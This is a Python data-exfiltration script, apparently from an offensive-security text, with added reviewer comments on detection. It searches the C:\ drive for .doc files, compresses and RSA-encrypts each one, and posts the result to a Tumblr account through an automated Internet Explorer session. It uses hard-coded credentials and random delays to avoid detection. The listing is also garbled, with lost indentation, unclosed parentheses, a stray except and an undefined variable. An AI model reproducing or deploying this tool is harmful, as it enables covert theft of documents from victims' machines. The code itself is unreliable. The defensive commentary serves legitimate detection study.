ie_exfil.py
#!/usr/bin/env python
__author__ = 'kalcho'
import win32com.client
import os
import fnmatch
import time
import random
import zlib
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
# Module-level settings read by the functions below.
# Filename suffix that the discovery loop at the end of the file filters on.
doc_type = ".doc"
# NOTE(review): the account credentials are hard-coded in plaintext. Anything
# committed to a repository this way has to be treated as disclosed and rotated.
# The address looks like the hosting site's e-mail obfuscation placeholder,
# not the author's original value.
username = "[email protected]"
password = "justinBHP2014"
# Empty in this listing; encrypt_string() hands it to RSA.importKey().
public_key = ""
def wait_for_browser(browser):
# wait for the browser to finish loading a page
# Polls browser.ReadyState and sleeps 0.1 s between checks; the loop condition
# stops holding once the property equals 4 or the string "complete".
# NOTE(review): no timeout is visible here, and the listing has lost its
# indentation, so where the loop body ends is inferred rather than shown.
while browser.ReadyState != 4 and browser.ReadyState != "complete":
time.sleep(0.1)
return
def encrypt_string(plaintext):
# Compress `plaintext` with zlib, encrypt the compressed bytes chunk by chunk
# with RSA-OAEP under the module-level public_key, and return the concatenated
# ciphertext base64-encoded.
#
# NOTE(review): two statements below lack their closing parenthesis in this
# listing and the indentation has been lost; the code is documented as found.
#
# Defender's view: what leaves the host is compressed, encrypted and
# base64-encoded, so content inspection at the egress point sees only an opaque
# high-entropy text blob. Keyword or file-type matching on the payload will not
# fire; detection has to rest on host behaviour (which process read the
# documents, which process drives the browser) and on unusual post bodies.
chunk_size = 256
print "Compressing: %d bytes" % len(plaintext
plaintext = zlib.compress(plaintext)
print "Encrypting %d bytes" % len(plaintext)
# import the key text and wrap it in an OAEP cipher object (the name is reused)
rsakey = RSA.importKey(public_key)
rsakey = PKCS1_OAEP.new(rsakey
encrypted = ""
offset = 0
while offset < len(plaintext):
chunk = plaintext[offset:offset+chunk_size]
# a chunk shorter than chunk_size is padded with spaces up to chunk_size
if len(chunk) % chunk_size != 0:
chunk += " " * (chunk_size - len(chunk))
encrypted += rsakey.encrypt(chunk)
offset += chunk_size
# Python 2 string codec: turns the raw ciphertext into base64 text
encrypted = encrypted.encode("base64")
print "Base64 encoded crypto: %d" % len(encrypted)
return encrypted
def encrypt_post(filename):
# Read the file at `filename` in binary mode and return the pair
# (encrypted_title, encrypted_body): the path string and the file contents,
# each passed through encrypt_string().
# The whole file is read into memory in one call.
# open and read the file
fd = open(filename, "rb")
contents = fd.read()
fd.close()
# both the file name and the contents are encrypted, so neither appears in
# clear text in what is later posted
encrypted_title = encrypt_string(filename)
encrypted_body = encrypt_string(contents)
return encrypted_title, encrypted_body
def random_sleep():
# Pause for a random whole number of seconds between 5 and 10, inclusive.
# NOTE(review): presumably meant to make the scripted browser session look
# less mechanical; the irregular gaps mean timing rules that expect a fixed
# interval are a poor fit for spotting this activity.
time.sleep(random.randint(5, 10))
return
def login_to_tumblr(ie):
# Fill in the login form of the page loaded in `ie` with the module-level
# username and password, submit it, and wait for the browser to settle.
#
# NOTE(review): the `except IndexError` below has no matching `try:` in this
# listing and the indentation has been lost; the code is documented as found.
# The handler body is `pass`, so an IndexError would be swallowed silently.
#
# Defender's view: the credentials are written into the page through the DOM,
# so on the wire this is an ordinary form submission made by the browser.
# retrieve all elements in the document
full_doc = ie.Document.all
# iterate looking for the login form
for i in full_doc:
if i.id == "signup_email":
i.setAttribute("value", username)
elif i.id == "signup_password":
i.setAttribute("value", password)
random_sleep()
# you can be presented with different home pages
# submit the first form when its id is "signup_form", otherwise the second
if ie.Document.forms[0].id == "signup_form":
ie.Document.forms[0].submit()
else:
ie.Document.forms[1].submit()
except IndexError, e:
pass
random_sleep()
# the login form is the second form on the page
wait_for_browser(ie)
return
def post_to_tumblr(ie, title, post):
# Put `title` and `post` into the new-post page loaded in `ie` and click the
# post button, then wait for the browser to finish.
#
# The elements are found by id: "post_one" receives the title as its value,
# "post_two" receives the body as innerHTML, and "create_post" is the element
# whose first child is clicked.
# NOTE(review): title_box and post_form are bound only if those ids are
# present on the page; no handling for a changed page layout is visible.
# The listing has lost its indentation, so where the loop ends is inferred.
full_doc = ie.Document.all
for i in full_doc:
if i.id == "post_one":
i.setAttribute("value", title)
title_box = i
i.focus()
elif i.id == "post_two":
i.setAttribute("innerHTML", post)
print "Set text area"
i.focus()
elif i.id == "create_post":
print "Found post button"
post_form = i
i.focus()
# move focus away from the main content box
random_sleep()
title_box.focus()
random_sleep()
# post the form
post_form.children[0].click()
wait_for_browser(ie)
random_sleep()
return
def exfiltrate(document_path):
# Start Internet Explorer through COM, log in, open the new-text-post page,
# encrypt the file at `document_path` and submit it as a post, then quit IE.
#
# Defender's view: the browser is driven through the
# "InternetExplorer.Application" COM object, so the web requests are made by
# Internet Explorer rather than by the Python interpreter, and the destination
# is a mainstream blogging site. Per-process or reputation-based egress rules
# therefore see normal-looking browser traffic. More useful signals are on the
# host: a scripting interpreter creating this COM object, an IE process started
# for automation (typically visible as the `-Embedding` switch on its command
# line), and the same interpreter reading many documents beforehand.
ie = win32com.client.Dispatch("InternetExplorer.Application")
# the browser window is shown on the desktop
ie.Visible = 1
# head to tumblr and login
# NOTE(review): the login URL is plain http:// while the post URL is https://;
# whether the site redirects the first request is not visible from here.
ie.Navigate("http://www.tumblr.com/login")
wait_for_browser(ie)
print "Logging in..."
login_to_tumblr(ie)
print "Logged in...navigating"
ie.Navigate("https://www.tumblr.com/new/text")
wait_for_browser(ie)
# encrypt the file
title, body = encrypt_post(document_path)
print "Creating new post..."
post_to_tumblr(ie, title, body)
print "Posted!"
# destroy the IE instance
ie.Quit()
ie = None
return
# main loop for document discovery
# NOTE: the first line of code below is not indented
# Walks the whole C:\ tree and, for every file name ending in doc_type, calls
# exfiltrate() and then waits for the operator at the "Continue?" prompt.
# NOTE(review): document_path is used below but is not assigned anywhere in
# this listing; the code is documented as found.
# Defender's view: a recursive walk of the entire system drive by a scripting
# interpreter, followed by reads of every matching document, is a burst of
# file-system activity that endpoint telemetry can flag before any upload.
for parent, directories, filenames in os.walk("C:\\"):
for filename in fnmatch.filter(filenames, "*%s" % doc_type):
print "Found: %s" % document_path
exfiltrate(document_path)
raw_input("Continue?")